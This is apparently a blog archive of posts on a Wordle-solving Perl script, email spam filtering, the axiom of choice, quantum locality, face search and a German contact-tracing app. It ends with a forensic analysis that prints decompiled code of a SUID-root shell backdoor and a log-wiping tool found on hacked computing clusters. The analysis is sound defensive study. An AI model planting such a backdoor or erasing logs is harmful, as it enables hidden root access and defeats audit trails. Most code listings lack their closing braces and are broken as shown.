Monday, January 17, 2022

You got me wordle!

 Since a few days, I am following the hype and play wordle. I think I got lucky the first days but I had already put in some strategy as in starting with words where the possible results are most telling. I was thinking that getting the vowels right early is a good idea so I tend to start with "HOUSE" (continuing three vowels and an S) possibly followed by "FAINT" (containing the remaining vowels plus important N and T).

With this start it never took me more than four guesses so far and twice I managed to find the solution in three guesses.

Of course, over time you start thinking how to optimise this. I knew that Donald Knuth had written a paper solving the original Mastermind showing that five moves are sufficient to always find the answer. So today, I sat down and wrote a perl script to help. It does not do the full minimax (but that shouldn't be too hard from where I am) but at least tells you which of your possible next guesses leaves the best worst case in terms of number of remaining words after knowing the result of your guess. 

In that metric, it turns out "ARISE" is the optional first guess (leaving at most 168 out of the possible 2314 words on this list after knowing the result). In any case, here is the source: 

NB: Since i started playing, there was no word that contained the same letter more than once, so I am not 100% sure how those cases are handled (like what color do the two 'E' in "AGREE" receive if the solution is "AISLE" (in mastermind logic, the second would be green the other grey, not yellow) and what when the solution were "EARLY"? So my script does not handle those cases correct probably (for EARLY it would color both yellow).

#!/usr/local/bin/perl -w

use strict;

# Load the word list of possible answers
my @words = ();
open (IN, "answers.txt") || die "Cannot open answers: $!\n";
while(<IN>) {
  push @words, uc($_);
close IN;

my %letters = ();
my @appears = ();

# Positions at which letter $l can still appear
foreach my $c (0..25)  {
  my $l = chr(65 + $c);
  $letters{$l} = [1,1,1,1,1];

# Running without an initial guess shows that ARISE is the best guess at it leaves 168 words.

&filter("ARISE", &bewerten("ARISE", "SOLAR"));
#&filter("SMART", &bewerten("SMART", "SOLAR"));

# Find the remaining words
my @remain = @words;
# Only keep words containing the letters in @appeads
foreach my $a(@appears) {
  @remain = grep {/$a/} @remain;
my $re = &makeregex;

# Apply positional constraints
@remain = grep {/$re/} @remain;

my $min = @remain;
my $best = '';

# Loop over all possible guesses and targets and count how ofter a potential result appears for a guess
foreach my $g(@remain) {
  my %results = ();
  foreach my $t(@remain) {
    ++$results{&bewerten($g, $t)}
  my $max = 0;
  foreach my $res(keys %results) {
    $max = $results{$res} if $results{$res} > $max;
  #print "$g leaves at most $max.\n";
  if ($min > $max) {
    $min = $max;
    $best = $g;

print "Best guess: $best leaves at most $min.\n";

# Assemble a regex for the postional informatiokn
sub makeregex {
  my $rem = '';
  foreach my $p (0..4) {
    $rem .= '[';
    foreach my $l (sort keys %letters) {
      $rem .= $l if $letters{$l}->[$p];
    $rem .= ']';
  return $rem;

# Find new constraints arising from the result of a guess
sub filter {
  my ($guess, $result) = @_;

  my @a = split //, $result;
  my @w = split //, uc($guess);
  foreach my $p (0..4) {
    my $l = $w[$p];
    if ($a[$p] == 0) {
      $letters{$l} = [0,0,0,0,0];
    } elsif ($a[$p] == 1) {
      &setletter($l, $p, 0);
      push @appears, $l;
    } else {
      foreach my $o (sort keys %letters) {
	&setletter($o, $p, 0);
      &setletter($l, $p, 1);

# Update the positional information for letter $l at position $p with value $v
sub setletter {
  my ($l, $p, $v) = @_;
  my @a = @{$letters{$l}};
  $a[$p] = $v;
  $letters{$l} = \@a;

# Find the result for $guess given the $target
sub bewerten {
  my ($guess, $target) = @_;
  my @g = split //, $guess;
  my @t = split //, $target;

  my @result = (0,0,0,0,0);
  foreach my $p(0..4) {
    if($g[$p] eq $t[$p]) {
      $result[$p] = 2;
      $t[$p] = '';
      $g[$p] = 'x';
  $target = join('', @t);
  foreach my $p(0..4) {
    if($target =~ /$g[$p]/) {
      $result[$p] = 1;
  return join('', @result);

Friday, July 23, 2021

Email is broken --- the spammers won

 I am an old man. I am convinced email a superior medium for person to person information exchange. It is text based, so you don't need special hardware to use it, it can still transport various media formats and it is inter-operational, you are not tied to one company offering a service but thanks to a long list of RFCs starting with number 822 everybody can run their own service.  Via GPG or S/MIME you can even add somewhat decent encryption and authentication (at least for the body of the message) even though that is not optimal since historically it came later.

But the real advantage is on the client side: You have threading, you have the option to have folders to store your emails, you can search through them, you can set up filters so routine stuff does not clog up your inbox. And when things go really pear shaped (as they tend to do every few years), you can still recover your data from a text file on your hard drive.

This is all opposed to the continuous Now of messengers where already yesterday's message has scrolled up never to be seen again. But the young folks tend to prefer those and I cannot see any reason those would be preferable (except maybe that you get notifications on your phone). But up to now, it was still an option to say to our students "if you want to get all relevant information, check your email, it will be there".

But today, I think, this is finally over. The spammers won.

Over the last months of the pandemic, I already had to realise, mailing lists are harder and harder to use. As far as I can tell, nobody offers decent mailing lists on the net (at least without too much cost and with reasonable data protection ambitions), probably because those would immediately be used by spammers. So you have to run your own. For the families of our kid's classes at school and for daycare, to spread information that could no longer be posted on physical notice boards, I tried to set up lists on mailman like we used to do it on one of my hosted servers. Oh, what a pain. There are so many hoops you have to jump through so the messages actually end up in people's inboxes. For some major email providers (I am looking at you hosteurope) there is little chance unless the message's sender is in the recipient's address book for example. And yes, I have set up my server correctly, with reverse DNS etc working.

But now, it's application season again. We have received over 250 applications for the TMP master program and now I have to inform applicants about their results. The boundary conditions is that I want to send an individual mail to everybody  that contains their name and I want to digitally sign it so applicants know it is authentic and not sent by some prankster impersonating me (that had happened in the past, seriously). And I don't want to send those manually.

So I have a perl script (did I mention I am old), that reads the applicants' data from a database, composes the message with the appropriate template, applies a GPG signature and sends it off to the next SMTP server.

In the past, I had already learned that inside the university network, you have to sleep 10 seconds after each message as every computer that sends emails at a higher rate is considered taken over by some spammers and automatically disconnected from the network for 30 minutes.

This year, I am sending from the home office and as it turns out, some of my messages never make it to the recipients. There is of course no error message to me (thanks spammers) but the message seems to be silently dropped. It's not in the inbox and also cannot be found in the spam folder. Just gone.

I will send paper letters as well (those are required for legal reasons anyway) with a similar script and thanks to TeX being text based on the input side. But is this really the answer for 2021? How am I supposed to inform people I have not (yet) met from around the world in a reliable way? 

I am lost.

Friday, June 25, 2021

On Choice

 This is a follow-up to a Twitter discussion with John Baez that did not fit into the 260 character limit. And before starting, I should warn you that I have never studied set theory in any seriousness and everything I am about to write here is only based on hearsay and is probably wrong.

I am currently teaching "Mathematical Statistical Physics" once more, large part of which is to explain the operator algebraic approach to quantum statistical physics, KMS states and all that. Part of this is that I cover states as continuous linear functionals on the observables (positive and normalised) and in the example of B(H), the bounded linear operators on a Hilbert space H, I mention that trace class operators $$\rho\in {\cal S}^1({\cal H})$$ give rise to those via $$\omega(a) = {\hbox tr}(\rho a).$$

And "pretty much all" states arise in this way meaning that the bounded operators are the (topological) dual to trance class operators but, for infinite dimensional H, not the other way around as the bi-dual is larger. There are bounded linear functionals on B(H) that don't come from trace class operators. But (without too much effort), I have never seen one of those extra states being "presented". I have very low standards here for "presented" meaning that I suspect you need to invoke the axiom of choice to produce them (and this is also what John said) and for class this would be sufficient. We invoke choice in other places as well, like (via Hahn-Banach) every C*-algebra having faithful representations (or realising it as a closed Subalgebra of some huge B(H)).

So much for background. I wanted to tell you about my attitude towards choice. When I was a student, I never had any doubt about it. Sure, every vector space has a basis, there are sets that are not Lebesque measurable. A little abstract, but who cares. It was a blog post by Terrence Tao that made me reconsider that (turns out, I cannot find that post anymore, bummer). It goes like this: On one of these islands, there is this prison where it is announced to the prisoners that the following morning, they are all placed in a row and everybody is given a hat that is either black or white. No prisoner can see his own hat but all of those in front of him. They can guess their color (and all other prisoners hear the guess). Those who guess right get free while those who guess wrong get executed. How many can go free?

Think about it.

The answer is: All but one half. The last one says white if he sees an even number of white hats in front of him. Then all the others can deduce their color from this parity plus the answers of the other prisoners behind them. So all but the last prisoner get out and the last has a 50% chance.

But that was too easy. Now, this is a really big prison and there are countably infinitely many prisoners. How many go free? When they are placed in a row, the row extends to infinity only in one direction and they are looking in this infinite direction. The last prisoner sees all the other prisoners.

Think about it.

In this case, the answer is: Almost all, all but finitely many. Out of all infinite sequences of black/white form equivalence classes where two sequences are equivalent if they differ at at most finitely many places, you could say they are asymptotically equal. Out of these equivalence classes, the axiom of choice allows us to pick one representative of each. The prisoners memorise these representatives (there are only aleph1 many, they have big brains). The next morning in the court of the prison, all prisoners can see almost all other prisoners, so they know which equivalence class of sequences was chosen by the prison's director. Now, every prisoner announces the color of the memorised representative at his position and by construction, only finitely many are wrong.

This argument as raised some doubts in me if I really want choice to be true. I came to terms with it and would describe my position as agnostic. I mainly try to avoid it and better not rely too much on constructions that invoke it. And for my physics applications this is usually fine.

But it can also be useful in everyday's life: My favourite example of it is in the context of distributions. Those are, as you know, continuous linear functionals on test functions. The topology on the test functions, however, is a bit inconvenient, as you have to check all (infinitely many) partial derivates to converge. So you might try to do the opposite thing: Let's study a linear functional on test functions that is not continuous. Turns out, those are harder to get hold of than you might think: You might think this is like linear operators where continuity is equivalent to boundedness. But this case is different: You need to invoke choice to find one. But this is good, since this implies that every concrete linear functional that you can construct (write down explicitly) is automatically continuous, you don't have to prove anything!

This type of argument is a little dangerous: You really need more than "the usual way to get one is to invoke choice". You really need that it is equivalent to choice. And choice says that for every collection of sets, the Cartesian product is non-empty. It is the "every" that is important. The collection that consists of copies of the set {apple} trivially has an element in the Cartesian product, it is (apple, apple, apple, ...). And this element is concrete, I just constructed it for you.

This caveat is a bit reminiscent of a false argument that you can read far too often: You show that some class of problems is NP-complete (recent incarnations: deciding if an isolated string theory vacuum as a small cosmological constant, deciding if a spin-chain model is gapped, determining the phase structure of some spin chain model, ...) and then arguing that these problems are "hard to solve". But this does not imply that a concrete problem in this class is difficult. It is only that solving all problems in this class of problems is difficult. Every single instance of practical relevance could be easy (for example because you had additional information that trivialises the problem). It could well be that you are only interested in spin chain Hamiltonians of some specific form and that you can find a proof that all of them are gapped (or not gapped for that matter). It only means that your original class of problems was too big, it contained too many problems that don't have relevance in your case. This could for example well be for the string theory vacua: In the paper I have in mind, that was modelled (of course actually fixing all moduli and computing the value of the potential in all vacua cannot be done with today's technology) by saying there are N moduli fields and each can have at least two values with different values of its potential (positive or negative) and we assume you simply have to add all those values. Is there one choice of the values of all moduli fields such that the sum of the energies is epsilon-close to 0? This turns out to be equivalent to the knapsack-problem which is known to be NP-complete. But for this you need to allow for all possible values of the potential for the individual moduli. If, for example, you knew the values for all moduli are the same, that particular incarnation of the problem is trivial. So just knowing that the concrete problem you are interested in is a member of a class of problems that is NP-complete does not make that concrete problem hard by itself.

What is you attitude towards choice? When is the argument "Here is a concrete, constructed example of a thing x. I am interested in some property P of it. To show there are y that don't have property P, I need to invoke choice. Does this prove x has property P?" to be believed?

Friday, July 10, 2020

Locality Confusion or: What Entanglement Can and Cannot Do For You

I really enjoyed last week's Zoom edition of the annual Strings conference. Clifford has said many of the things about it that I support wholeheartedly, so I don't have to repeat them here. One of the things I really liked was the active participation in the chat channel that accompanied the talks.

But some of the things I read there gave me the impression that there is some confusion out there about locality and things that can happen in quantum theories that showed up in discussions related to black hole information loss (or the lack thereof). So I though, maybe it's a good idea to sort these out.

Let's start with some basic quantum information: Entanglement is strange, it allows you to do things that maybe at first you did not expect. You can already see this in the easy, finite dimensional situation. Assume our Hilbert space is a tensor product
\[H=H_h\otimes H_t\]
of stuff here and stuff there. Further, for simplicity, assume both factors have dimension d and we can pick a basis
\[(e_\alpha)_{1\le \alpha\le d}\]

for both. If we have a maximally entangled state like
\[\Omega = \frac 1{\sqrt d} \sum_\alpha e_\alpha\otimes e_\alpha\]
the first observation is that instead of acting with an operator A here, you can as well act with the transposed (with respect to our basis) operator there, as you can see when writing out what it means in component:
\[(A\otimes id)\Omega = (id\otimes A^T)\Omega = \frac 1{\sqrt d}\sum_{\alpha\beta} a_{\alpha\beta} e_\beta\otimes e_\alpha.\]
That is, with the entangled state, everything, I can do here creates a state that can also be gotten by doing stuff there. And the converse is true as well: Take any state $\psi \in H$. Then I can find an operator $A$ that acts only here that creates this state from the entangled state:
\[ \psi = (A\otimes id)\Omega.\]
How can we find $A$? First use Schmidt decomposition to write
\[\psi = \sum_j c_j f_j\otimes\tilde f_j\]
where the $c$'s are non-negative numbers and both the $f$'s and the $\tilde f$'s are an ortho-normal basis. Define $V$ to be the unitary matrix that does the change of basis from the $e$'s to the $f$'s. Then
\[ A = \sqrt{d\rho_h}V\]
where we used the density matrix $\rho_h$ that is obtained from $\psi$ as a partial trace over the Hilbert space there (i.e. the state that we see here):
\[\rho_h = tr_{H_t}|\Omega\rangle\langle \Omega| = \sum_j c_j |f_j\rangle\langle f_j|.\]
It's a simple calculation that shows that this $A$ does the job.

In other words, you can create any state of the combined here-there system from an entangled state just by acting locally here.

But what is important is that as still operators here and there commute
\[ [A\otimes id, id\otimes B] =0 \]
you cannot influence measurements there by acting here. If you only measure there you cannot tell if the global state is still $\Omega$ or if I decided to act here with a non-trivial unitary operator (which would be the time evolution for my local Hamiltonian $A$).

It is easy to see, that you don't really need a maximally entangled state $\Omega$ to start with, you just need enough entanglement such that $\rho_h$ is invertible (i..e that there are no 0 coefficients in the Schmidt decomposition of the state you start with).

And from this we can leave the finite dimensional realm and go to QFT, where you have the Reeh-Schlieder theorem which tells you essentially that the quantum vacuum of a QFT has this entanglement property: In that setting, here corrensponds to any local neighbourhood (some causal diamond for example) while there is everything space-like localised from here (for a nice introduction see Witten's lecture notes on quantum information).

But still, this does not mean that by acting locally here in your room you can suddenly make some particle appear on the moon that somebody there could measure (or not). QFT is still local, operators with space-like separation cannot influence each other. The observer on the moon cannot tell if the particle observed there is just a vacuum fluctuation or if you created it in your armchair even though RS holds and you can create state with a particle on the moon. If you don't believe it, go back to the finite dimensional explicit example above. RS is really the same thing pimped to infinite dimensions.

And there is another thing that complicates these matters (and which I learned only recently): Localization in gauge theories is more complicated that you might think at first: Take QED. Thanks to Gauß' law, you can write an expression for the total charge $Q$ as an integral over the field-strength over a sphere at infinity. This seems to suggest that $Q$ has to commute with every operator localised in a finite region as $Q$ is localised in a region space-like to your finite reason. But what if that localised operator is a field operator, for example the electron field $\psi(x)$? Does this mean $Q, \psi(x)]=0$? Of course not, since the electron is charge, it should have
\[ [Q,\psi(x)] = e \psi(x).\]
But does that mean that an observer at spatial infinity can know if I apply $\psi(x)$ right here right now? That would be acausal, I could use this to send messages faster than light.

How is this paradox resolved? You have to be careful about the gauge freedom. You can either say that a gauge fixing term you add in the process of quantisation destroys Gauß' law. Alternatively, you can see that acting with a naked $\psi(x)$ destroys the gauge you have chosen. You can repair this but the consequence is that the "dressed" operator is no longer localised at $x$ but in fact is smeared all over the place (as you have to repair the gauge everywhere). More details can be found in Wojciech Dybalski's lecture notes in the very end (who explained this solution to me).

The same holds true for arguments where you say that the total (ADM) mass/energy  in a space time can be measured at spatial infinity.

So the upshot is: Even though quantum theory is weird, you still have to be careful with locality and causality and when arguing about what you can do here and what that means for the rest of the universe. This also holds true when you try to resolve the black hole information loss paradox. Did I say islands?

PimEyes knows what you did last summer

You might have come across news about a search engine for faces: . You can upload your photo and it will tell you where in the interwebs it has seen you before. Of course, I had to try it. Here are my results:

OK, that was to be expected. This is the image I use whenever somebody asks me for a short bio with a picture or which I often use as avatar. This is also the first hit when you search for my name on Google Images. This is fine with me, this image is probably my pubic persona when it comes to the information super-highway. But still, if you meet me on the street, you can use PimEyes to figure out who I am. But that was to be expected. Then there come some variants of this picture and an older one that I used for similar purposes.

Next come pictures like these:

There seems to be an Armenian politician with some vague resemblance and the internet has a lot of pictures from him. Fine. I can hide behind him (pretty much like my wife whose name is so common in Germany that the mother of one of our daughter's classmates has the same when you only consider first and maiden name as well as a former federal minister).

But then there is this:

And yes, that's me. This is some open air concert one or two years ago. And it's not even full frontal like the sample I uploaded. And there probably 50 other people who are as much recognisable as myself in that picture. And even though this search engine seems not to know about them right now, there must be hundreds of pictures of similar Ali Mitgutsch Wimmelbuch quality that show at which mass activities I participated. I have to admit, I am a little bit scared.

Tuesday, June 16, 2020

Installiert die Corona-Warn-App auch wenn keiner sagt, dass sie sicher ist --- oder ein Lehrstück in Öffentlichkeitskommunikation

Seit heute gibt es sie, die Corona-Warn-App, und ihr könnt (und solltet, siehe unten) sie herunterladen und installieren.

Das ist die kurze Nachricht. Sie hätte auch in einen Tweet gepasst. Warum noch ein Blogpost? Das liegt daran, dass viele Bedenken gegen diese App kursieren und andererseits niemand (insbesondere nicht der CCC) sagt "Alles Quatsch, die App ist sicher!".  Diese Situation würde ich gerne etwas erklären.

Das fängt mit einem Mantra an, dass seit Jahren hergebetet wird: "Sicherheit (im Sinn von Security) ist kein Zustand, sondern ein Prozess". Jede Software, deren Komplexität wesentlich über
20 GOTO 10
hinaus geht, wird Bugs haben. Ich zitiere gerne eine alte IBM Studie, die besagt, dass es praktisch nicht gelingt, weniger als 1 Bug pro etwa 10.000 Zeilen Code zu haben, weil man, wenn man den Code weiter versucht zu debuggen und testen, dabei mehr Fehler einbaut als man eliminiert. Selbst der NASA, die sich da sehr viel Mühe gibt, fallen regelmässig Raumsonden wegen Softwarefehlern hart auf Planetenoberflächen. Und das sicher nicht, weil die leichtfertig waren.

Daher kann es nur darum gehen, möglichst wenig Fehler zu produzieren (mit entsprechenden Tests, Audits, Software-Werkzeugen, die einem helfen etc). Aber niemand, der weiss, was er tut, wird garantieren können, dass man alles gefunden hat. Man kann nur dokumentieren, dass man sich Mühe gegeben hat und dabei nach best practices gehandelt hat. Und vor allem: Wenn dann doch ein Fehler auftaucht, muss man die entsprechende Fehlerkultur haben und ihn schnell und effektiv beseitigen. Besser geht's leider nicht. Die Alternative ist nur, keine Computer bzw keine Software zu benutzen.

Und weil Leute, die wissen, wovon sie reden, genau diesen Umstand kennen, lassen sie sich nicht dazu verleiten "Die App habe ich geprüft, sie ist sicher" öffentlich zu sagen.

Was man aber sehr wohl feststellen kann, ist wenn etwas unsicher ist und man eine Lücke gefunden hat. Und das wird ja auch regelmäßig gemacht und auch der CCC hält sich nicht zurück, über Probleme öffentlich zu reden, wenn man sie denn gefunden hat (responsible disclosure beachtend), wie zB in der jüngsten Vergangenheit beim Telematix-Netzwerk im Gesundheitswesen.

Was man sehr wohl hören sollte, ist dass man genau sowas über die Corona-Warn-App zumindest bisher nicht hört. Es gibt sehr wohl die 10 Prüfsteine für eine solche App und am Anfang sah es nicht so aus, als würden sie eingehalten (zB zentrale Serverstruktur, closed source), aber an dieser Stelle beschwert sich momentan niemand. Vielmehr gibt es viel Lob, dass auf Kritik reagiert wurde: Es werden die Kontaktdaten nur lokal auf den Telefonen gespeichert (auch schon weil Apple und Google dies als sinnvoll eingesehen haben und es nicht wirklich eine App gegen die entsprechenden Betriebsystemhersteller gegeben hätte, schon alleine weil die die Betriebssysteme es aus Securitygründen Apps nicht einfach erlauben, dauerhaft und im Hintergrund Bluetooth zu verwenden) und der Source-Code zusammen mit der Entwicklungsgeschichte wurde öffentlich auf GitHub zur öffentlichen Überprüfung zugänglich gemacht. Und die Öffentlichkeit hat tatsächlich Probleme gefunden. Aber diese wurden nicht ignoriert, sondern behoben.

Und genau das ist der Prozess, von dem ich oben sprach. Den darf man auch gerne mal loben und sagen "so soll's sein, gerne wieder". Und das wird ja auch getan. Man muss dem eben nur zuhören und verstehen (was leider nicht so richtig kommuniziert wird), dass dieses Lob eigentlich die bessere Variante des "Zertifikat: die App ist sicher" ist. Hier ist leider das Schweigen nicht laut genug, das "nicht geschimpft ist genug gelobt" ist leider nicht sehr öffentlichkeitswirksam, bzw bedarf einer Erklärung, wie ich sie hier versuche. Update: Linus Neumann, CCC Sprecher, macht es doch.

"Aber es gibt doch Kritikpunkte" höre ich Euch sagen. Ja, die gibt es. Aber schauen wir sie uns an, ob die von ihnen ausgehende Gefahr den möglichen Nutzen der App übersteigen kann:

  • "Man kann Leute tracken" Ja, kann man. Aber nur, wenn man die Republik flächendeckend mit Bluetooth-Empfängern überzieht. Pavel Meyer hat dieses Argument ausführlicher gemacht.
  • "Ich muss Bluetooth anschalten, das hatte schon Lücken in der Vergangenheit." Stimmt. Gilt aber auch für Wifi/Internet. Wenn man sich darum sorgt, empfehle ich das Handy abzuschaffen. Update: Bei Android-Smartphones, die nicht gegen bekannte Probleme gepatched werden können (Android Update nach 1. Februar 2020), ist es vielleicht doch keine gute Idee, Bluetooth einzuschalten. Kann man aber drüber nachdenken, ob das ein Problem der App oder des Smartphones ist.
  • "Die App ist open source, aber was ist mit der Library von Apple/Google?". Stimmt auch. Gilt aber auch für das Betriebssystem des Handys. Wenn Apple/Google euch überwachen wollen und eure Daten raustragen wollen, können sie das nicht erst seit der App. Sondern seit ihr ein Handy benutzt. Also wieder besser: Handy in den Shredder.
  • "Wenn nicht viele die App benutzen, nützt sie nichts" (oder auch in der Version "die App ist nicht verpflichtend, so kann sie nicht funktionieren, also benutze ich sie nicht"). Ja. Henne und Ei. Dann benutz sie doch. Ist wieder ein Beispiel des Gefangenendilemmas, kann man ändern indem man selber kooperiert und hofft, dass die anderen zum gleichen Schluss kommen.
Bleibt noch eine Meta-Frage: Ich möchte eigentlich diese ganze Geschichte auch als eine Erfolgsgeschichte des CCC abbuchen, man hat (nehmen wir mal an, es hat tatsächlich einen Einfluss gehabt) echte Verbesserungen erreichen können. Vor allem wenn man sich vor Augen führt, was am Anfang der Geschichte vorgeschlagen wurde, wie GPS-tracking, eine zentrale, staatliche Kontaktdatenbank etc. Der Umstand, dass hier auf die Expertise gehört wird, ist auch ein langfristiger Erfolg, es wurde verstanden, sich über die Jahre als kompetenter und kritischer Beobachter zu etablieren. Die Öffentlichkeit wurde für entsprechende Themen hellhörig gemacht.

Andererseits lese ich auf social media viel Kritik an der App und Erklärungen, warum sie böse ist oder warum man sie sich selber auf keinen Fall installieren will. Die halbwegs rationalen Einwände habe ich eben aufgezählt (auch wenn meine Kosten-Nutzen-Abwegung klar anders ist und ich first thing this morning mir die App installiert habe), es gibt aber auch unendlich viel, was sich im Spektrum Halbwissen bis Aluhuttum bewegt. Es werden viele Bedenken geäussert, die aber eher aus dem Bauch kommen (der Staat will uns Stasi-mässig überwachen) aber aus technischer Sicht nach allem, was man weiss, nicht haltbar sind. Und irgendwie fürchte ich, dass viele von diesen Leuten auch von CCC und Co in ihrer kritischen Sicht mitsozialisiert worden sind und irgendwann falsch abgebogen sind.

Und das ist dann schon ein Wermutstropfen bzw eine Aufgabe für die Zukunft: Wie schafft man es, vor allem auch in seiner Kommunikation, noch deutlicher die begründeten von den unbegründeten Bedenken (die aber so ähnlich klingen) zu trennen?  Wie kann man hier offensiver seine Sicht kommunizieren ohne in ein "Wir versprechen Euch, ist alles sicher" verfallen zu müssen? Dieser Text ist jedenfalls ein Versuch in diese Richtung.

Und noch der nötige Disclaimer: Ich bin zwar Mitglied beim CCC (sowohl in München als auch schweigendes im Bundes-CCC). Ich spreche aber nicht für den Club. Dies ist nur meine Meinung (die aber aus meiner Sicht natürlich jedeR teilen sollte, auch alle Clubs der Welt. Haha)

Saturday, May 16, 2020

High Performance Hackers

In the last few days, there was news that several big academic high performance computing centers had been hacked. Here in Munich, LRZ, the Leibniz Rechenzentrum was affected but apparently also computers at the LMU faculty of physics (there are a few clusters in the institute's basement). You could hear that it were Linux systems that were compromised and the attackers left files in /etc/fonts.

I could not resist and also looked for these files and indeed found those on one of the servers:

helling@hostname:~$ cd /etc/fonts/
helling@hostname:/etc/fonts$ ls -la
total 52
drwxr-xr-x   4 root root  4096 Apr  5  2018 .
drwxr-xr-x 140 root root 12288 May 14 10:07 ..
drwxr-xr-x   2 root root  4096 Aug 29  2019 conf.avail
drwxr-xr-x   2 root root  4096 Aug 29  2019 conf.d
-rwsr-sr-x   1 root root  6256 Apr  5  2018 .fonts
-rw-r--r--   1 root root  2582 Apr  5  2018 fonts.conf
-rwxr-xr-x   1 root root 15136 Apr  5  2018 .low

Uhoh, a dot-file with SUID root?!? I had an evening to spare so I could finally find out if I can use some of the forensic tools, that are around. As everybody know, the most important one is "strings". But neither strings .fonts nor strings .low revealed anything interesting about those programs. So we need some heavier lifting. I chose ghidra (thanks NSA for that) as my decompiler.

Let's look at .fonts (the suid one) first. It consists of one central function that I called runbash. Here is what I got after some renaming of symbols:

void runbash(void)

  char arguments [4];
  char command [9];
  int i;
  command[0] = 'N';
  command[1] = '\0';
  command[2] = '\n';
  command[3] = '\n';
  command[4] = 'J';
  command[5] = '\x04';
  command[6] = '\x06';
  command[7] = '\x1b';
  command[8] = '\x01';
  i = 0;
  while (i < 9) {
    command[i] = command[i] ^ (char)i + 0x61U;
    i = i + 1;
  arguments[0] = '\x03';
  arguments[1] = '\x03';
  arguments[2] = '\x10';
  arguments[3] = '\f';
  i = 0;
  while (i < 4) {
    arguments[i] = arguments[i] ^ (char)i + 0x61U;
    i = i + 1;

There are two strings, command and arguments and first there is some xoring with a loop variable going on. I ran that as a separate C program and what it produces is that command ends up as "/bin/bash" and arguments as "bash". So, all this program does is it starts a root shell. And indeed it does (i tried it on the server, of course it has been removed since then).

The second program, .low, is a bit longer. It has a main function that mainly deals with command line options depending on which it calls one of three functions that I termed machmitfile(), machshitmitfile() and writezerosinfile() which all take a file name as argument and modify those files by removing lines or overwriting stuff with zeros or doing some other rewriting that I did not analyse in detail:

/* WARNING: Could not reconcile some variable overlaps */

ulong main(int argc, char ** argv)

  char * __s1;
  char * pcVar1;
  bool opbh;
  bool optw;
  bool optb;
  bool optl;
  bool optm;
  bool opts;
  bool opta;
  int numberarg;
  char uitistgleich[40];
  passwd * password;
  char * local_68;
  char opt;
  uint local_18;
  uint retval;
  char * filename;

  scramble( &UTMP, 0xd);
  scramble( &WTMP, 0xd);
  scramble( &BTMP, 0xd);
  scramble( &LASTLOG, 0x10);
  scramble( &MESSAGES, 0x11);
  scramble( &SECURE, 0xf);
  scramble( &WARN, 0xd);
  scramble( &DEBUG, 0xe);
  scramble( &AUDIT0, 0x18);
  scramble( &AUDIT1, 0x1a);
  scramble( &AUDIT2, 0x1a);
  scramble( &AUTHLOG, 0x11);
  scramble( &HISTORY, 0x1b);
  scramble( &AUTHPRIV, 0x11);
  scramble( &DEAMONLOG, 0x13);
  scramble( &SYSLOG, 0xf);
  scramble( &ACHTdPROZENTs, 7);
  scramble( &OPTOPTS, 0xb);
  scramble( &UIDISPROZD, 7);
  scramble( &ERRORARGSEXIT, 0x11);
  scramble( &ROOT, 4);
  filename = (char * ) 0x0;
  local_18 = 0;
  opbh = false;
  optw = false;
  optb = false;
  optl = false;
  optm = false;
  opts = false;
  opta = false;
  now = time((time_t * ) 0x0);
  while (_opt = getopt(argc, argv, & OPTOPTS), _opt != -1) {
    switch (_opt) {
    case 0x61:
      opta = true;
    case 0x62:
      optb = true;
      /* WARNING: Subroutine does not return */
    case 0x66:
      filename = optarg;
    case 0x68:
      opbh = true;
    case 0x6c:
      optl = true;
    case 0x6d:
      optm = true;
    case 0x73:
      opts = true;
    case 0x74:
      local_18 = 1;
      numberarg = atoi(optarg);
      if (numberarg != 0) {
        numberarg = atoi(optarg);
        now = (time_t) numberarg;
        if ((0 < now) && (now < 0x834)) {
          now = settime();
    case 0x77:
      optw = true;
  if (((((!opbh) && (!optw)) && (!optb)) && ((!optl && (!optm)))) && ((!opts && (!opta)))) {
  if (opbh) {
    if (argc <= optind + 1) {
      /* WARNING: Subroutine does not return */
    if (filename == (char * ) 0x0) {
      filename = & UTMP;
    retval = machmitfile(filename, argv[optind], argv[(long) optind + 1], (ulong) local_18);
  } else {
    if (optw) {
      if (argc <= optind + 1) {
        /* WARNING: Subroutine does not return */
      if (filename == (char * ) 0x0) {
        filename = & WTMP;
      retval = machmitfile(filename, argv[optind], argv[(long) optind + 1], (ulong) local_18);
    } else {
      if (optb) {
        if (argc <= optind + 1) {
          /* WARNING: Subroutine does not return */
        if (filename == (char * ) 0x0) {
          filename = & BTMP;
        retval = machmitfile(filename, argv[optind], argv[(long) optind + 1], (ulong) local_18);
      } else {
        if (optl) {
          if (argc <= optind) {
            /* WARNING: Subroutine does not return */
          if (filename == (char * ) 0x0) {
            filename = & LASTLOG;
          retval = writezerosinfile(filename, argv[optind], argv[optind]);
        } else {
          if (optm) {
            if (argc <= optind + 3) {
              /* WARNING: Subroutine does not return */
            if (filename == (char * ) 0x0) {
              filename = & LASTLOG;
            retval = FUN_00401bb0(filename, argv[optind], argv[(long) optind + 1],
              argv[(long) optind + 2], argv[(long) optind + 3]);
          } else {
            if (opts) {
              if (argc <= optind) {
                /* WARNING: Subroutine does not return */
              local_68 = argv[optind];
              if (filename == (char * ) 0x0) {
              } else {
                retval = machshitmitfile(filename, local_68, (ulong) local_18, local_68);
            } else {
              if (opta) {
                if (argc <= optind + 1) {
                  /* WARNING: Subroutine does not return */
                __s1 = argv[optind];
                pcVar1 = argv[(long) optind + 1];
                numberarg = strcmp(__s1, & ROOT);
                if (numberarg == 0) {
                  local_18 = 1;
                machmitfile( & WTMP, __s1, pcVar1, (ulong) local_18);
                machmitfile( & UTMP, __s1, pcVar1, (ulong) local_18);
                machmitfile( & BTMP, __s1, pcVar1, (ulong) local_18);
                writezerosinfile( & LASTLOG, __s1, __s1);
                machshitmitfile( & MESSAGES, __s1, (ulong) local_18, __s1);
                machshitmitfile( & MESSAGES, pcVar1, (ulong) local_18, pcVar1);
                machshitmitfile( & SECURE, __s1, (ulong) local_18, __s1);
                machshitmitfile( & SECURE, pcVar1, (ulong) local_18, pcVar1);
                machshitmitfile( & AUTHPRIV, __s1, (ulong) local_18, __s1);
                machshitmitfile( & AUTHPRIV, pcVar1, (ulong) local_18, pcVar1);
                machshitmitfile( & DEAMONLOG, __s1, (ulong) local_18, __s1);
                machshitmitfile( & DEAMONLOG, pcVar1, (ulong) local_18, pcVar1);
                machshitmitfile( & SYSLOG, __s1, (ulong) local_18, __s1);
                machshitmitfile( & SYSLOG, pcVar1, (ulong) local_18, pcVar1);
                machshitmitfile( & WARN, __s1, (ulong) local_18, __s1);
                machshitmitfile( & WARN, pcVar1, (ulong) local_18, pcVar1);
                machshitmitfile( & DEBUG, __s1, (ulong) local_18, __s1);
                machshitmitfile( & DEBUG, pcVar1, (ulong) local_18, pcVar1);
